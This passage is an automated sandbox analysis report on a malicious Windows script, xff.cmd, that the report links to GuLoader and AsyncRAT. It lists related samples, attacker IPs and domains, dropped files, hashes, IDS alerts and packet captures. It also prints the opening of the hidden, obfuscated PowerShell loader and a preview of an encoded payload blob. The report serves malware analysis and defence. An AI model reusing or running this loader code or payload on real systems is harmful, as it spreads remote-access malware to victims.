                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:xff.cmd
                Detection:MAL
                Classification:mal100.troj.evad.winCMD@13/9@4/4
                EGA Information:Failed
                HCA Information:
                • Successful, ratio: 91%
                • Number of executed functions: 94
                • Number of non-executed functions: 3
                Cookbook Comments:
                • Found application associated with file extension: .cmd

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target powershell.exe, PID 4324 because it is empty
                • Execution Graph export aborted for target powershell.exe, PID 5700 because it is empty
                • Execution Graph export aborted for target wab.exe, PID 5892 because it is empty
                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • VT rate limit hit for: xff.cmd

                Simulations

                Behavior and APIs

                TimeTypeDescription
                15:02:58API Interceptor4970x Sleep call for process: powershell.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                69.31.136.17new.cmdGet hashmaliciousGuLoaderBrowse
                  las.cmdGet hashmaliciousGuLoaderBrowse
                    zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                      kam.cmdGet hashmaliciousGuLoaderBrowse
                        upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                          update.vbsGet hashmaliciousGuLoader, XWormBrowse
                            file.vbsGet hashmaliciousGuLoaderBrowse
                              windows.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                windows.vbsGet hashmaliciousGuLoader, XWormBrowse
                                  file.vbsGet hashmaliciousGuLoader, XWormBrowse
                                    12.202.180.134new.cmdGet hashmaliciousGuLoaderBrowse
                                      las.cmdGet hashmaliciousGuLoaderBrowse
                                        kam.cmdGet hashmaliciousUnknownBrowse
                                          sample.cmdGet hashmaliciousUnknownBrowse
                                            zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                              xff.cmdGet hashmaliciousUnknownBrowse
                                                xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                  las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                    las.cmdGet hashmaliciousUnknownBrowse
                                                      las.cmdGet hashmaliciousGuLoaderBrowse
                                                        104.21.28.80zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                          las.cmdGet hashmaliciousGuLoaderBrowse
                                                            kam.cmdGet hashmaliciousGuLoaderBrowse
                                                              upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                  file.vbsGet hashmaliciousGuLoaderBrowse
                                                                    windows.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                      update.vbsGet hashmaliciousGuLoaderBrowse
                                                                        69.31.136.57new.cmdGet hashmaliciousGuLoaderBrowse
                                                                          xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                            las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                              las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  windows.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                                    file.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                                      update.vbsGet hashmaliciousGuLoaderBrowse
                                                                                        time.vbsGet hashmaliciousGuLoaderBrowse
                                                                                          https://www.sendspace.com/file/dwfkjzGet hashmaliciousFormBookBrowse

                                                                                            Domains

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            fs13n2.sendspace.comnew.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 69.31.136.57
                                                                                            xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                            • 69.31.136.57
                                                                                            QWMSA_Payment_Invoice0939.vbsGet hashmaliciousQuasarBrowse
                                                                                            • 69.31.136.57
                                                                                            fs03n5.sendspace.comupdate.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                                            • 69.31.136.17
                                                                                            file.vbsGet hashmaliciousGuLoaderBrowse
                                                                                            • 69.31.136.17
                                                                                            windows.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                            • 69.31.136.17
                                                                                            file.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                                            • 69.31.136.17
                                                                                            UGH82MSGHWUSHSDHWQOL.vbsGet hashmaliciousUnknownBrowse
                                                                                            • 69.31.136.17
                                                                                            dhhj.duckdns.orgwindows.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                            • 12.202.180.134
                                                                                            www.sendspace.comnew.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 172.67.170.105
                                                                                            las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 172.67.170.105
                                                                                            kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 172.67.170.105
                                                                                            zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                            • 104.21.28.80
                                                                                            xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                            • 172.67.170.105
                                                                                            las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                            • 172.67.170.105
                                                                                            las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 104.21.28.80
                                                                                            kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 104.21.28.80
                                                                                            upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                                            • 104.21.28.80
                                                                                            update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                                            • 104.21.28.80

                                                                                            ASNs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            CLOUDFLARENETUSnew.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 172.67.170.105
                                                                                            las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 172.67.170.105
                                                                                            kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 172.67.170.105
                                                                                            zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                            • 104.21.28.80
                                                                                            http://hxjmm.check-tl-ver-154-2.comGet hashmaliciousUnknownBrowse
                                                                                            • 104.21.46.101
                                                                                            xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                            • 172.67.170.105
                                                                                            las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                            • 172.67.170.105
                                                                                            https://gheenirrigation.zendesk.com/api/v2/channels/voice/calls/CA22db3177fb7a310b9b6e136c494a58df/twilio/voicemail/recordingGet hashmaliciousUnknownBrowse
                                                                                            • 104.18.72.113
                                                                                            https://t.co/PmbTTSQ6z4Get hashmaliciousUnknownBrowse
                                                                                            • 162.247.243.29
                                                                                            Offer 15492024 15602024.docx.docGet hashmaliciousUnknownBrowse
                                                                                            • 172.67.171.37
                                                                                            GTT-BACKBONEGTTDEnew.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 69.31.136.57
                                                                                            las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 69.31.136.17
                                                                                            kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 69.31.136.53
                                                                                            zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                            • 69.31.136.53
                                                                                            xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                            • 69.31.136.53
                                                                                            las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                            • 69.31.136.53
                                                                                            las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 69.31.136.53
                                                                                            kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 69.31.136.57
                                                                                            upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                                            • 69.31.136.53
                                                                                            update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                                            • 69.31.136.53
                                                                                            GTT-BACKBONEGTTDEnew.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 69.31.136.57
                                                                                            las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 69.31.136.17
                                                                                            kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 69.31.136.53
                                                                                            zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                            • 69.31.136.53
                                                                                            xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                            • 69.31.136.53
                                                                                            las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                            • 69.31.136.53
                                                                                            las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 69.31.136.53
                                                                                            kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 69.31.136.57
                                                                                            upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                                            • 69.31.136.53
                                                                                            update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                                            • 69.31.136.53
                                                                                            FISERV-INCUSnew.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 12.202.180.134
                                                                                            las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 12.202.180.134
                                                                                            kam.cmdGet hashmaliciousUnknownBrowse
                                                                                            • 12.202.180.134
                                                                                            sample.cmdGet hashmaliciousUnknownBrowse
                                                                                            • 12.202.180.134
                                                                                            zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                            • 12.202.180.134
                                                                                            xff.cmdGet hashmaliciousUnknownBrowse
                                                                                            • 12.202.180.134
                                                                                            xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                            • 12.202.180.134
                                                                                            las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                            • 12.202.180.134
                                                                                            las.cmdGet hashmaliciousUnknownBrowse
                                                                                            • 12.202.180.134
                                                                                            las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 12.202.180.134

                                                                                            JA3 Fingerprints

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            3b5074b1b5d032e5620f69f9f700ff0enew.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 104.21.28.80
                                                                                            • 69.31.136.57
                                                                                            filePY.cmdGet hashmaliciousUnknownBrowse
                                                                                            • 104.21.28.80
                                                                                            • 69.31.136.57
                                                                                            las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 104.21.28.80
                                                                                            • 69.31.136.57
                                                                                            kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 104.21.28.80
                                                                                            • 69.31.136.57
                                                                                            zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                            • 104.21.28.80
                                                                                            • 69.31.136.57
                                                                                            xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                            • 104.21.28.80
                                                                                            • 69.31.136.57
                                                                                            las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                            • 104.21.28.80
                                                                                            • 69.31.136.57
                                                                                            S28BW-420120416270,pdf.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                            • 104.21.28.80
                                                                                            • 69.31.136.57
                                                                                            Dextron Group PO.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                            • 104.21.28.80
                                                                                            • 69.31.136.57
                                                                                            las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 104.21.28.80
                                                                                            • 69.31.136.57
                                                                                            37f463bf4616ecd445d4a1937da06e19new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 104.21.28.80
                                                                                            • 69.31.136.17
                                                                                            las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 104.21.28.80
                                                                                            • 69.31.136.17
                                                                                            zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                            • 104.21.28.80
                                                                                            • 69.31.136.17
                                                                                            xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                            • 104.21.28.80
                                                                                            • 69.31.136.17
                                                                                            las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                            • 104.21.28.80
                                                                                            • 69.31.136.17
                                                                                            las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 104.21.28.80
                                                                                            • 69.31.136.17
                                                                                            V_273686.Lnk.lnkGet hashmaliciousMalLnkBrowse
                                                                                            • 104.21.28.80
                                                                                            • 69.31.136.17
                                                                                            kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            • 104.21.28.80
                                                                                            • 69.31.136.17
                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                            • 104.21.28.80
                                                                                            • 69.31.136.17
                                                                                            Platosammine.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • 104.21.28.80
                                                                                            • 69.31.136.17

                                                                                            Dropped Files

                                                                                            No context

                                                                                            Created / dropped Files

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):11608
                                                                                            Entropy (8bit):4.8908305915084105
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                                                                            MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                                                                            SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                                                                            SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                                                                            SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                                                                            Malicious:false
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):64
                                                                                            Entropy (8bit):1.1940658735648508
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Nlllul/nq/llh:NllUyt
                                                                                            MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                                                                            SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                                                                            SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                                                                            SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                                                                            Malicious:false
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:@...e................................................@..........

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1c0vfxcq.np5.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Reputation:high, very likely benign file
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2a2rp1yz.umu.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_44feiqn3.21f.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qnlqbymi.shr.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Roaming\Bevogtes140.Out

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):488392
                                                                                            Entropy (8bit):5.9540372489568805
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:PqNUdgiNuRq7DGhS067IHb4BUCTEUHddGd7/jDt0jz/:Ci9NvGhS0iUCh47rDa/
                                                                                            MD5:6A89EC6B007920C37249774D8B8CB1E5
                                                                                            SHA1:BC34D0226A45DD3C55A5F42E5E02ECE6079F3AEE
                                                                                            SHA-256:09FDF5A6B9E458508DD06389CA3EBBAFCE89A8D35B539B1A5E131C1D6FF939A7
                                                                                            SHA-512:A21F562D2D2213FC981C6C08895A4E5E0B6163DB49858047F720E19001DE667348A630DE5BAB275D5973480827093DA4A06D87D2B198C91336849C5576A15191
                                                                                            Malicious:false
                                                                                            Preview:6wKSBHEBm7s2nhUA6wJZzusC6+MDXCQEcQGb6wJJ4rn/5t2zcQGbcQGbgcERzAw36wLsJXEBm4HB8EwVFXEBm3EBm3EBm3EBm7qE3eG46wImcOsC2pVxAZtxAZsxynEBm+sC03eJFAvrArz4cQGb0eJxAZtxAZuDwQTrAoPu6wLGDIH5ihQBBHzMcQGb6wIGXYtEJARxAZvrAjfMicNxAZvrAlMjgcODNCgB6wJHxHEBm7ojXFKVcQGb6wKUw4Hyf4Ntd3EBm3EBm4HyXN8/4usCic5xAZvrAvupcQGb6wLnVHEBm4sMEHEBm+sC+amJDBPrAq46cQGbQnEBm3EBm4H6VC0FAHXWcQGbcQGbiVwkDHEBm3EBm4HtAAMAAHEBm3EBm4tUJAhxAZtxAZuLfCQE6wKMM+sCiXiJ6+sCUHNxAZuBw5wAAABxAZvrAqEUU3EBm3EBm2pAcQGbcQGbievrAlq06wIdf8eDAAEAAADAGQRxAZvrApTigcMAAQAAcQGbcQGbU3EBm3EBm4nr6wKtI3EBm4m7BAEAAOsCuppxAZuBwwQBAADrAnYPcQGbU+sCvW9xAZtq/3EBm+sCoFyDwgVxAZvrAtscMfZxAZvrAjFNMclxAZtxAZuLGusCvebrAuUCQXEBm+sCtZ85HAp18+sCPXNxAZtG6wJu2+sCisKAfAr7uHXc6wJPvXEBm4tECvxxAZvrAiaUKfDrAn/ZcQGb/9LrAqTJ6wJkt7pULQUAcQGbcQGbMcDrAgQvcQGbi3wkDHEBm3EBm4E0B+rKF/VxAZvrAlV2g8AEcQGbcQGbOdB15XEBm+sC6oeJ++sCWgFxAZv/1+sC8MZxAZuMT898D0NCTFAFU1tgS9XCUmxydBjkL2yZS/3dKAeU3D5BQky6cisfLNEqIerKF/pmEw3w6pJCzSBD8qdQzhf16kvtLTCqS/plCw3w6pCumFMOJnQbMawLkUvmaJmaJs0XS+bmm6BscDENU/jq

                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4A1AT7E39JLZVVKFKZ16.temp

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):6224
                                                                                            Entropy (8bit):3.731537505931615
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:HzDmlGtCO3CyGU2UVAukvhkvklCywQnh+ilHJYSogZoAHh+ilLYSogZo01:nEO3CgTzkvhkvCCtyh+ixHBh+iHHD
                                                                                            MD5:9D611F8D528692AF61269DDF6DFEE38A
                                                                                            SHA1:82A0F811A36A11019D9B4541B4AB6F0CCEA1B54F
                                                                                            SHA-256:01BAC2CF3E0FEB66F8E75D477F6E771AEA2ACD0A6F273328DD471949EA32E1D2
                                                                                            SHA-512:E57654530E7B2357252C41BB418AC762DAFEE7B8933717065A170AD4D2C6C558D791EC0F593389529713B6B8F386180A29ED436F634A880E85A9A10FC8C3D7B7
                                                                                            Malicious:false
                                                                                            Preview:...................................FL..................F.".. ...J.S.....N.C...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...\...C....NX.C.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.X[............................^.A.p.p.D.a.t.a...B.V.1......XY...Roaming.@......EW<2.XY...../......................u..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.XW.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.XW.....2......................'7.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.XW.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.XW.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.X].....u...........

                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):6224
                                                                                            Entropy (8bit):3.731537505931615
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:HzDmlGtCO3CyGU2UVAukvhkvklCywQnh+ilHJYSogZoAHh+ilLYSogZo01:nEO3CgTzkvhkvCCtyh+ixHBh+iHHD
                                                                                            MD5:9D611F8D528692AF61269DDF6DFEE38A
                                                                                            SHA1:82A0F811A36A11019D9B4541B4AB6F0CCEA1B54F
                                                                                            SHA-256:01BAC2CF3E0FEB66F8E75D477F6E771AEA2ACD0A6F273328DD471949EA32E1D2
                                                                                            SHA-512:E57654530E7B2357252C41BB418AC762DAFEE7B8933717065A170AD4D2C6C558D791EC0F593389529713B6B8F386180A29ED436F634A880E85A9A10FC8C3D7B7
                                                                                            Malicious:false
                                                                                            Preview:...................................FL..................F.".. ...J.S.....N.C...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...\...C....NX.C.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.X[............................^.A.p.p.D.a.t.a...B.V.1......XY...Roaming.@......EW<2.XY...../......................u..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.XW.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.XW.....2......................'7.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.XW.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.XW.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.X].....u...........

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:ASCII text, with very long lines (6371), with no line terminators
                                                                                            Entropy (8bit):5.254796604295901
                                                                                            TrID:
                                                                                              File name:xff.cmd
                                                                                              File size:6'371 bytes
                                                                                              MD5:ae6a3a8912f6dd675542cc40cb5c6088
                                                                                              SHA1:ba9cf3a09d51ab5f090fc9dac6f1253321c922e4
                                                                                              SHA256:cfbbcd80b1537d3ba3b27a57002496542db471094bae1612abc70bac5fd80808
                                                                                              SHA512:ac34dd4755fa9a5ba35c5c404aea505a5ef26b2ece6dc8f6bc7e65a7fc934e17af60aa208aab74fbf2719086c9e9dd0a1c85548d740967ecce27483e89778699
                                                                                              SSDEEP:192:oeOol1MILxFMeVO+BqDwoJK7bE9COaJppuq8TH6+Q/:ocjMIdSHwowbLuqkH6+Q/
                                                                                              TLSH:C3D14DABB23B20394F1E157C7DB18C025F51682B51266F7296295ADEA4C3C40E0FAF85
                                                                                              File Content Preview:start /min powershell.exe -windowstyle hidden "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous

                                                                                              File Icon

                                                                                              Icon Hash:9686878b929a9886

                                                                                              Network Behavior

                                                                                              Snort IDS Alerts

                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                              05/23/24-21:03:56.699407TCP2035595ET TROJAN Generic AsyncRAT Style SSL Cert87974971112.202.180.134192.168.2.6
                                                                                              05/23/24-21:03:56.699407TCP2030673ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server)87974971112.202.180.134192.168.2.6

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              May 23, 2024 21:03:00.238656044 CEST49699443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:00.238694906 CEST44349699104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:00.238771915 CEST49699443192.168.2.6104.21.28.80
